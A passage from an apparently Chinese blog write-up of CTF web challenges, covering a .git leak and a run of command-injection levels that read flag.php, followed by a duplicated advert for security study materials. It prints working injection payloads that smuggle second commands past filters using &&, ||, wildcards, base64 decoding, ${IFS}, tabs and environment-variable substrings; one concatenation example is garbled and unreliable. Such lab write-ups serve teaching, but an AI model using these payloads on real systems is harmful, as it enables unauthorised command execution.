继续访问 (记得把*去除)
显示403 说明该目录有东西
尝试访问/.git/ (注意最后的 / 不要遗漏) 依旧显示403 大概率git泄露
使用git脚本
访问/admin/secret.php
bp抓包 字典爆破 得到flag
Web7
ls显示目录出现flag.php index.php
输入dir=&&tac flag.php时,整个system函数调用会变成:
system(“ls &&tac flag.php”)
先执行ls 成功执行后执行tac flag.php(system执行在linux的shell中)
Web8 通配符绕过
多了个无回显 其他与上题同理" >/dev/null 2>&1"
ls显示目录出现flag.php index.php
输入cmd=tac fl?g.php||
得到 system("cmd=tac fl?g.php|| >/dev/null 2>&1) ||前的命令不受影响,||后的不回显
执行tac flag.php ||后面不执行
Web9 通配符绕过
过滤 flag & ; ( /i 说明以上过滤不区分大小写)
逻辑符 & ; 都被过滤,只能使用 ||
ls显示目录出现flag.php index.php
输入cmd=tac fla?.php||
Web10 Base64编码解码绕过
过滤 flag & ; cat tac nl more od 不区分以上大小写
ta? ca? 无法用通配符补齐tac cat 所以使用编码解码绕过过滤
ls显示目录出现flag.php index.php
tac flag.php base64编码 →dGFjIGZsYWcucGhw
句1 echo 'dGFjIGZsYWcucGhw'|base64 -d → 即输出 tac flag.php
句2 ls(写什么不重要,反正也不执行)
使用||组合
cmd=echo 'dGFjIGZsYWcucGhw' |base64 -d||ls
1
若 ; 未被过滤情况下
使用拼接绕过
cmd=a=‘t’;b=‘ac’;c=‘fla’;d=‘g.php’; a a ab c {c} c{d} (我不确定)
Web11 符号过滤-空格过滤
发现 空格 被过滤
ls显示目录出现flag.php index.php
输入cmd=tac${IFS}fla?.php
输入cmd=tac%09fla?.php
Web12 符号过滤-空格过滤-字符串截取
过滤 flag & ; 空格 IFS <> x09
ls显示目录出现flag.php index.php
输入cmd=env
寻找 = 与 空格 实现字符串截取替代空格
找到以下信息
PHP_EXTRA_CONFIGURE_ARGS=–enable-fpm --with
= 右侧 空格索引为12
空格替换→索引12,输出1个字符,即
${PHP_EXTRA_CONFIGURE_ARGS:12:1} 代替 空格
tac flag.php → tac${PHP_EXTRA_CONFIGURE_ARGS:12:1}fla?.php
输入cmd=tac${PHP_EXTRA_CONFIGURE_ARGS:12:1}fla?.php
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
015183)]
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
1945
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
